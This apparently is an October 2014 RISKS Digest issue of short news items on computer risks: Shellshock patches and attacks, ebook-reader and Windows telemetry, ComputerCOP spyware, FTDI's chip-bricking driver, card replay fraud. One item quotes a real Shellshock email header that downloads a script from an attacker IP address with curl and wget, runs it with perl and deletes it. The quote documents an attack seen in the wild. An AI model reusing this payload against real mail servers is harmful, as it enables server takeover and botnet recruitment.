Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
The unmanned cargo rocket exploded seconds after liftoff from a NASA site in eastern Virginia. http://www.nytimes.com/2014/10/29/us/rocket-heading-to-international-space-station-explodes-no-one-is-hurt.html
The first three articles in RISKS-28.30 describe a Dallas hospital blaming EHR software for not diagnosing the first US case of Ebola. However on a Friday evening, the hospital told another story. (Bad news released on Friday evening is a popular PR tactic) But on Friday evening, the hospital effectively retracted that portion of its statement, saying that `there was no flaw' in its electronic health records system. The hospital said “the patient's travel history was documented and available to the full care team in the electronic health record (E.H.R.), including within the physician's workflow.'' http://www.nytimes.com/2014/10/04/us/containing-ebola-cdc-troops-west-africa.html An ER patient history is not meaningless paperwork. It may be diagnostically significant and an ER doc is responsible for examining it. All patients are asked about any foreign travel. While EHR software can be improved, human and/or institutional error should be assigned the major blame for this failure to diagnose Ebola.
According to a BBC report, insurance companies are refusing to insure certain models of cars, or are requiring additional safeguards. The reason? The electronic keys can be hacked, and the number of thefts has been increasing dramatically. This is probably the most direct consumer connection between (computer) security and insurance that I've seen. Could you imagine "your homeowners insurance bill is going up because you run Windows"? http://www.bbc.com/news/technology-29786320
Ars Technica via NNSquad http://arstechnica.com/security/2014/10/hp-accidentally-signed-malware-will-revoke-certificate/ Regardless of the cause, the revocation of the affected certificate will require HP to re-issue a large number of software packages with a new digital signature. While the certificate drop may not affect systems with the software already installed, users will be alerted to a bad certificate if they attempt to re-install software from original media. The full impact of the certificate revocation won't be known until after Verisign revokes the certificate on October 21, Wahlin said. Oops.
Caroline Craig, InfoWorld | Oct 24, 2014 http://www.infoworld.com/article/2838181/security/clueless-fbi-sabotages-its-anti-encryption-campaign.html FBI Director Comey says smartphone encryption puts law enforcement in peril. Too bad he doesn't seem to understand technology
http://arstechnica.com/tech-policy/2014/10/fbi-director-says-chinese-hackers-are-like-a-drunk-burglar/
The Postal Service approved nearly 50,000 requests last year from law enforcement agencies to secretly track the mail of ordinary Americans for use in criminal and national security investigations. http://www.nytimes.com/2014/10/28/us/us-secretly-monitoring-mail-of-thousands.html
Ars via NNSquad http://arstechnica.com/tech-policy/2014/10/computercop-the-dubious-internet-safety-software-given-to-families-nationwide/ Police chiefs, sheriffs, and district attorneys have handed out hundreds of thousands of copies of the disc to parents for free at schools, libraries, and community events, usually as a part of an "Internet Safety" outreach initiative. (You can see the long list of ComputerCOP outlets here.) The packaging typically features the agency's official seal and the chief's portrait, with a signed message warning of the "dark and dangerous off-ramps" of the Internet. As official as it looks, ComputerCOP is actually just spyware, generally bought in bulk from a New York company that appears to do nothing but market this software to local government agencies using shady information. The way ComputerCOP works is neither safe nor secure. It isn't particularly effective either, except for generating positive PR for the law enforcement agencies distributing it. As security software goes, we observed a product with a keystroke-capturing function, also called a "keylogger," that could place a family's personal information at extreme risk by transmitting those keystroke logs over the Internet to third-party servers without encryption. That means many versions of ComputerCOP leave children (and their parents, guests, friends, and anyone using the affected computer) exposed to the same predators, identity thieves, and bullies that police claim the software protects against. Furthermore, by providing a free keylogging program--software that operates without even the most basic security safeguards--law enforcement agencies are passing around what amounts to a spying tool that could easily be abused by people who want to snoop on spouses, roommates, or co-workers.
Nate Hoffelder, 6 Oct 2014 http://the-digital-reader.com/2014/10/06/adobe-spying-users-collecting-data-ebook-libraries/#.VDQhI_ldWYA Nate Hoffelder, 7 Oct 2014 http://the-digital-reader.com/2014/10/07/adobe-responds-reports-spying-half-truths-misleading-statements/#.VDRpCvldWIV
Ars Technica via NNSquad http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/ "Adobe's Digital Editions e-book and PDF reader—an application used by thousands of libraries to give patrons access to electronic lending libraries--actively logs and reports every document readers add to their local "library" along with what users do with those files. Even worse, the logs are transmitted over the Internet in the clear, allowing anyone who can monitor network traffic (such as the National Security Agency, Internet service providers and cable companies, or others sharing a public Wi-Fi network) to follow along over readers' shoulders. Ars has independently verified the logging of e-reader activity with the use of a packet capture tool. The exposure of data was first discovered by Nate Hoffelder of The Digital Reader, who reported the issue to Adobe but received no reply. Ars has also reached out to Adobe for comment with no response."
http://arstechnica.com/security/2014/10/check-point-hacks-bugzilla-tracking-system-to-demonstrate-bad-bug/
http://arstechnica.com/security/2014/10/white-hat-claims-yahoo-and-winzip-hacked-by-shellshock-exploiters/
There has been a critical security flaw identified in Drupal 7.x, an update is available. The flaw allows a SQL injection attack to compromise servers running Drupal. Details of the attack have been published. The relevant bug entry appears to be: https://www.drupal.org/node/2146839 Bob Gezelter, http://www.rlgsc.com
FYI—Didn't Ross Anderson's group at Cambridge demonstrate similar problems with chips&pins a while ago? [YES: See http://www.csl.sri.com/neumann/cacm233.pdf] Krebs on Security In-depth security news and investigation, 27 Oct 14 http://krebsonsecurity.com/2014/10/replay-attacks-spoof-chip-card-charges/ Replay Attacks Spoof Chip Card Charges An odd new pattern of credit card fraud emanating from Brazil and targeting U.S. financial institutions could spell costly trouble for banks that are just beginning to issue customers more secure chip-based credit and debit cards. Over the past week, at least three U.S. financial institutions reported receiving tens of thousands of dollars in fraudulent credit and debit card transactions coming from Brazil and hitting card accounts stolen in recent retail heists, principally cards compromised as part of the breach at Home Depot. The most puzzling aspect of these unauthorized charges? They were all submitted through Visa and MasterCard's networks as chip-enabled transactions, even though the banks that issued the cards in question haven't even yet begun sending customers chip-enabled cards. The most frustrating aspect of these unauthorized charges? They're far harder for the bank to dispute. Banks usually end up eating the cost of fraud from unauthorized transactions when scammers counterfeit and use stolen credit cards. Even so, a bank may be able to recover some of that loss through dispute mechanisms set up by Visa and MasterCard, as long as the bank can show that the fraud was the result of a breach at a specific merchant (in this case Home Depot). However, banks are responsible for all of the fraud costs that occur from any fraudulent use of their customers' chip-enabled credit/debit cards -- even fraudulent charges disguised as these pseudo-chip transactions. [...]
http://arstechnica.com/tech-policy/2014/10/apple-will-face-350m-trial-over-ipod-drm/
http://arstechnica.com/apple/2014/10/apple-updates-definitions-to-prevent-iworm-botnet-malware-on-macs/
OS X bash Update 1.0 is now available and addresses the following: Bash Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: In certain configurations, a remote attacker may be able to execute arbitrary shell commands Description: An issue existed in Bash's parsing of environment variables. This issue was addressed through improved environment variable parsing by better detecting the end of the function statement. This update also incorporated the suggested CVE-2014-7169 change, which resets the parser state. In addition, this update added a new namespace for exported functions by creating a function decorator to prevent unintended header passthrough to Bash. The names of all environment variables that introduce function definitions are required to have a prefix "__BASH_FUNC<" and suffix ">()" to prevent unintended function passing via HTTP headers. CVE-2014-6271 : Stephane Chazelas CVE-2014-7169 : Tavis Ormandy OS X bash Update 1.0 may be obtained from the following webpages: http://support.apple.com/kb/DL1767 - OS X Lion http://support.apple.com/kb/DL1768 - OS X Mountain Lion http://support.apple.com/kb/DL1769 - OS X Mavericks To check that bash has been updated: * Open Terminal * Execute this command: bash --version * The version after applying this update will be: OS X Mavericks: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13) OS X Mountain Lion: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12) OS X Lion: GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11) Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
Due to security issues in older versions, Apple has updated the web plug-in blocking mechanism to disable all versions prior to Flash Player 15.0.0.152 and 13.0.0.244. Information on blocked web plug-ins will be posted to: http://support.apple.com/kb/HT5655 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
Lucian Constantin, Infoworld, 21 Oct 2014 large-scale attacks The Fiesta exploit kit bundles an exploit for the CVE-2014-0569 vulnerability in Flash Player, researchers found http://www.infoworld.com/article/2836438/security/one-week-after-patch-flash-vulnerability-already-exploited-in-largescale-attacks.html
A consortium of merchants plans to introduce a payment system next year that will supplant the use of credit and debit cards. http://www.nytimes.com/2014/10/27/technology/personaltech/2-drug-chains-disable-apple-pay-as-a-rival-makes-plans-.html
Rite Aid and CVS are not accepting Apple Pay because they belong to a consortium of retailers planning to release their own mobile payment system next year. http://www.nytimes.com/2014/10/29/technology/apple-pay-runs-afoul-of-a-rival.html
http://arstechnica.com/business/2014/10/cvs-rite-aid-supported-alternative-to-apple-pay-already-hacked/
http://arstechnica.com/gadgets/2014/10/how-mobile-payments-really-work/
Sean Gallagher, Ars Technica, 3 Oct 2014 Mac.BackDoor.iWorm used Minecraft server subreddit for command and control. The Russian antivirus vendor Dr. Web has reported the spread of a new botnet that exclusively targets Apple computers running Mac OS X. According to a survey of traffic conducted by researchers at Dr. Web, over 17,000 Macs worldwide are part of the Mac.BackDoor.iWorm botnet-and almost a quarter of them are in the US. One of the most curious aspects of the botnet is that it uses a search of Reddit posts to a Minecraft server list subreddit to retrieve IP addresses for its command and control (CnC) network. That subreddit now appears to have been expunged of CnC data, and the account that posted the data appears to be shut down. ... http://arstechnica.com/security/2014/10/reddit-powered-botnet-infected-thousands-of-macs-worldwide/
Andrew Cunningham, Ars Technica, 29 Sep 2014 Fixes Bash bug discovered last week that's already been seen in the wild. http://arstechnica.com/apple/2014/09/apple-patches-shellshock-bash-bug-in-os-x-10-9-10-8-and-10-7/ [See also http://support.apple.com/kb/HT6495—PGN]
Sean Gallagher, Ars Technica, 30 Sep 2014 SANS' Internet Storm Center moves up threat level based on bash exploits in wild. Over the past few days, Apple, Red Hat, and others have pushed out patches to vulnerabilities in the GNU Bourne Again Shell (bash). The vulnerabilities previously allowed attackers to execute commands remotely on systems that use the command parser under some conditions-including Web servers that use certain configurations of Apache. However, some of the patches made changes that broke from the functionality of the GNU bash code, so now debate continues about how to "un-fork" the patches and better secure bash. At the same time, the urgency of applying those patches has mounted as more attacks that exploit the weaknesses in bash's security (dubbed "Shellshock") have appeared. In addition to the threat first spotted the day after the vulnerability was made public, a number of new attacks have emerged. While some appear to simply be vulnerability scans, there are also new exploit attempts that carry malware or attempt to give the attacker direct remote control of the targeted system. ... http://arstechnica.com/security/2014/09/shellshock-fixes-beget-another-round-of-patches-as-attacks-mount/
[attachment (Henry says, “but sometimes a picture is worth 1000 words.'')
deleted for RISKS. Sorry. PGN]
Here's the To: line:
To: {:;, }, /bin/sh.-c.'/bin/sh.-c.'cd/tmp, curl.-sO.178.254.31.165/ext.txt,
lwp-download.http:;, //178.254.31.165/ex.txt, wget.178.254.31.165/ex.txt,
fetch.178.254.31.165/ex.txt, perl.ex.txt,
<rm.-fr.ex.*'.&'.&@mailserver.internaldomain>
Cc, From, Subject, References, Message-ID, Comments, Keywords, Resent-From
are all similar.
Nothing quite like bashing the postman with shellshock...
Michael Mimoso Follow @mike_mimoso 27 Oct 2014
Shellshock Exploits Targeting SMTP Servers at Webhosts
https://threatpost.com/shellshock-exploits-targeting-smtp-servers-at-webhosts/109034
The persistence of the Shellshock vulnerability remains high more than a
month after it first surfaced. The latest attacks involved SMTP servers
belonging to web hosts, said a report published by the SANS Internet Storm
Center.
Attackers are using Shellshock exploits targeting the now infamous
vulnerability in Bash (Bourne Again Shell) in order to drop a perl script
onto compromised computers. The script adds the hacked computers to a
botnet that receives its commands over IRC, said a post on the Binary
Defense Systems website: “The attack leverages Shellshock as a main attack
vector through the subject, body, to, from fields. Once compromised, a perl
botnet is activated and beaconing on IRC for further instructions.''
Techworm via NNSquad http://www.techworm.net/2014/10/microsofts-windows-10-permission-watch-every-move.html "Microsoft collects information about you, your devices, applications and networks, and your use of those devices, applications and networks. Examples of data we collect include your name, email address, preferences and interests; browsing, search and file history; phone call and SMS data; device configuration and sensor data; and application usage." "If you open a file, we may collect information about the file, the application used to open the file, and how long it takes any use [of]it for purposes such as improving performance, or [if you]enter text, we may collect typed characters, we may collect typed characters and use them for purposes such as improving autocomplete and spell check features." Worth reading, even though the entire article is in a low-contrast font and italics. [See also Chris Merriman, *The Inquirer*, 3 Oct 2014 Its 'privacy' policy includes permission to use a keylogger http://www.theinquirer.net/inquirer/news/2373838/microsofts-windows-10-preview-has-permission-to-watch-your-every-move ]
I want to add a few of my own thoughts to that article on the Windows 10 preview version data collection policies. If any of those data collection features were enabled by default, and unless there's a big red warning at installation that you must respond to with more than a single click, explaining all these aspects, it's still unacceptable. Too many people will download this and use it like any other system without considering the implications. I couldn't care less what they plan to do when it goes out of beta at this juncture—I'm concerned about right now. As I recall they've done similar in previous previews, but the stakes are much higher now given government attitudes to collected data. It is a mistake to assume that everyone who will download this preview or end up with it installed (perhaps by their "IT Guy") will be cognizant of the options and implications. I'm the guy who found MS' undisclosed "phone home" behavior years ago. It was not an enormous privacy problem, but it was still telling and a lot of bad press for MS resulted.
Woody Leonhard, InfoWorld, 16 Oct 2014 Windows users are reporting significant problems with four more October Black Tuesday patches: KB 3000061, KB 2984972, KB 2949927, KB 2995388 http://www.infoworld.com/article/2834535/security/four-more-botched-black-tuesday-patches-kb-3000061-kb-2984972-kb-2949927-and-kb-2995388.html
Ah, the risks of missing documentation. Woody Leonhard, InfoWorld | 17 Oct 2014 Windows 7 upgrade compatibility patch gets a tweaked installer, while the SHA-2 hashing patch is summarily removed without explanation http://www.infoworld.com/article/2834930/security/microsoft-yanks-botched-patch-kb-2949927-re-issues-kb-2952664.html
Woody Leonhard, InfoWorld | 20 Oct 2014 Microsoft yanked SHA-2 patch KB 2949927, and now goes further and cautions users to uninstall the update http://www.infoworld.com/article/2835571/microsoft-windows/microsoft-says-best-way-to-fix-botched-kb-2949927-patch-is-to-kill-it.html
Gregg Keizer, Computerworld, 22 Oct 2014 Microsoft misses Windows bug, hackers slip past patch Last week's security update 'not robust enough,' say researchers who co-reported flaw http://www.infoworld.com/article/2837085/security/microsoft-misses-windows-bug-hackers-slip-past-patch.html
Microsoft Windows Update distributed new driver code that intentionally destroys "counterfeit" chips; the USB "PID" is set to 0 in the EEPROM of the device, rendering the device useless forever more. This ploy opens up a whole new front in the hacker wars; NSA TAO is no doubt rubbing its hands with delight as we speak. Just as STUXNET broke down one barrier in hacking; FTDI broke down another. E.g., in the future, look for iPhone and Android apps which disable their competitor apps & implanted medical devices that destroy other implanted medical devices found in the same human body. [...] Brian Benchoff, FTDI Screws Up, Backs Down, 24 Oct 2014 http://hackaday.com/2014/10/24/ftdi-screws-up-backs-down/
I confidently predict the next version will be Windows 20, which raises the obvious question of what follows Windows 80? I suggest Windows A. That buys another 26 major revisions, which should take us comfortably past the year 199Z (2025 AD).
Andy Patrizio, ITworld, 3 Oct 2014 It's not just your boss or the government that's spying on you, it's also the devices and technologies you embrace. http://www.infoworld.com/article/2687778/security/security-164894-12-privacy-destroying-personal-technologies.html
Lucian Constantin, InfoWorld, 7 Oct 2014 http://www.infoworld.com/article/2692521/security/critical-bugzilla-vulnerability-could-give-hackers-access-to-undisclosed-software-flaws.html Software projects that use the Bugzilla bug tracking software should deploy the latest patches immediately, security researchers said
Sean Gallagher, Ars Technica, 7 Oct 2014 Digital Editions even tracks which pages you've read. It might break a New Jersey Law. Adobe's Digital Editions e-book and PDF reader-an application used by thousands of libraries to give patrons access to electronic lending libraries-actively logs and reports every document readers add to their local "library" along with what users do with those files. Even worse, the logs are transmitted over the Internet in the clear, allowing anyone who can monitor network traffic (such as the National Security Agency, Internet service providers and cable companies, or others sharing a public Wi-Fi network) to follow along over readers' shoulders. ... http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/
FYI—DHS can now *legally* hone their PEN skills on other agencies, both on their websites and their mobile devices. Aliya Sternstein, NextGov.com. 3 Oct 2014 [Some selected quotes from the OMB memo:] http://www.nextgov.com/cybersecurity/2014/10/dhs-no-longer-needs-permission-slips-monitor-other-agencies-networks-vulnerabilities/95807/ "a proactive vulnerability scanning process" "only applicable to Federal civilian agency networks" "does not impact classified or national security systems and/or networks" "the number of phishing attacks is steadily increasing" "Scan Internet accessible addresses and public facing segments of Federal civilian agency systems for vulnerabilities on an ongoing basis as well as in response to newly discovered vulnerabilities on an urgent basis, to include without prior agency authorization on an emergency basis where not prohibited by law" "Provide DHS ... with a complete list of all Internet accessible addresses and systems, including static IP addresses for external websites, servers and other access points and domain name service names for dynamically provisioned systems" "Enter into a legally sufficient Memorandum of Agreement with DHS relating to the deployment of EINSTEIN (an intrusion detection and prevention capability operated by DHS)" "Specifically, this memorandum ... requires Federal agencies to notify DHS US-CERT of all cyber related (electronic) incidents ... ***within one hour***" "All existing Federal requirements for data protection and remote access are applicable to mobile devices" [...] See also http://www.whitehouse.gov/sites/default/files/omb/memoranda/2015/m-15-01.pdf
The following paragraphs are an attempt to explain why the NSA hasn't any interest in protecting you and me from cyber criminals. It isn't nonfeasance, but a result of the misapplication of Cold War thinking to the Internet, and the NSA's preoccupation with China instead of with criminal gangs on the Internet. You and I are merely the "human shields" in this new Cold Cyberwar which the US DoD has deluded itself exists with China. The US Defense Department in 2014 is still caught up in obsolete concepts from the Cold War when it inappropriately attempts to achieve "deterrence" through "mutual vulnerability" in *cyber warfare*. The concept of "Mutually Assured Destruction" (MAD) attempts to convince both sides in a conflict that no matter who starts a war, both sides will be utterly destroyed. MAD was the primary doctrine of the US throughout most of the Cold War, and although the Soviets never did attack, they also never completely bought into the MAD notion. A major component of MAD is "Mutual Vulnerability": since both sides are equally vulnerable, each feels that it has more to lose from a war than the other. However, one curious consequence of Mutual Vulnerability is that *Civil Defense is actually destabilizing*. If one side invests significantly in civil defense, it becomes less vulnerable, and may believe that a war is survivable. Such a civil defense strategy will break the "Mutual" in MAD. During the Cold War, therefore, the US invested almost nothing in civil defense; the Soviets—not so enamored with mutual vulnerability -- invested huge amounts. As the links & quotes below demonstrate, the US DoD today has already conceded that its cyber defenses are next-to-non-existent, and therefore has ramped up its *offenses*—e.g., the NSA's "TAO" group—because it believes that a MAD-style offensive deterrence is far cheaper than improving defenses (i.e., echoes of the US Cold War strategy). In the upside-down-world of MAD, mutual deterrence depends upon *mutual vulnerability*, and hence *more vulnerable is better* !?! The major problem with this MAD strategy is that while the deterrence may eventually work against the Chinese *state*, this deterrence has absolutely no effect against criminal enterprises terrorizing the Internet. None of these criminals feel the "Mutual" in MAD, much less the "Assured" or the "Destruction". So "MAD" is the reason why you and I remain vulnerable to ID crooks & thieves; the more vulnerable, the better the deterrence works—at least against the Chinese. If all of this sounds insane/MAD, you're right! It is insane, which is why RISKS readers have to blow the whistle on these bankrupt Cold War relic doctrines. [See also the following items, truncated for RISKS. PGN] "A World Gone MAD No Longer" http://missiledefensereview.org/2014/07/30/a-world-gone-mad-no-longer/ Sino-American Strategic Restraint in an Age of Vulnerability by David C. Gompert and Phillip C. Saunders http://www.dtic.mil/get-tr-doc/pdf?AD=ADA577518
Using a law designed to help catch drug traffickers, racketeers and terrorists by tracking their cash, the government has gone after run-of-the-mill business owners and wage earners. http://www.nytimes.com/2014/10/26/us/law-lets-irs-seize-accounts-on-suspicion-no-crime-required.html
Facebook uses mathematical formulas to predict what its users might want to read on the site, from which, a study says, about 30 percent of adults in America get their news. http://www.nytimes.com/2014/10/27/business/media/how-facebook-is-changing-th= e-way-its-users-consume-journalism.html
I'd be more worried about taxi drivers perusing the google's location history URL, finding areas where most destinations are, and staying there. The risk is then you can't get a cab anywhere else. BioMagResBank, UW-Madison—http://www.bmrb.wisc.edu
It's an excellent article, well worth the 10 minutes to read it. The Gimli Glider was in many ways the direct opposite of the Air France crash. In the Gimli case, there was a real and very severe problem, the plane was in the middle of nowhere and ran out of fuel. If the pilots hadn't taken skillful action, the plane would have fallen out of the sky and crashed. With the Air France flight, there was no physical problem other than that some sensors were iced over. As Langewiesche makes clear, if the pilots had done nothing at all, the plane would have been fine. The sensor loss made the plane drop back from the most automatic mode to a less automatic one, but even so, the plane was flying without difficulty.
FYI—I wonder if the music isn't "white noise" after all, but the sole sound of DRM. I can't wait for this clip to be posted to YouTube, so that a DMCA takedown notice can be issued by one of those DMCA bots! Lorena O'Neil, The Hollywood Reporter http://www.msn.com/en-us/music/news/taylor-swift-tops-canadian-itunes-chart-with-eight-seconds-of-white-noise/ar-BBaCB7A A glitch in the Canadian version of iTunes released a track called "Track 3," that looked like it could be a new track from her upcoming album 1989 but was actually just white noise. Nevertheless, the song soared to the top, beating out her new songs that actually are real music, including "Shake It Off," "Welcome to New York" and "Out of the Woods." Haters might hate but once a singer scores a chart-topping hit comprised solely of white noise, it's hard to deny she's an unstoppable musical force.
Please report problems with the web pages to the maintainer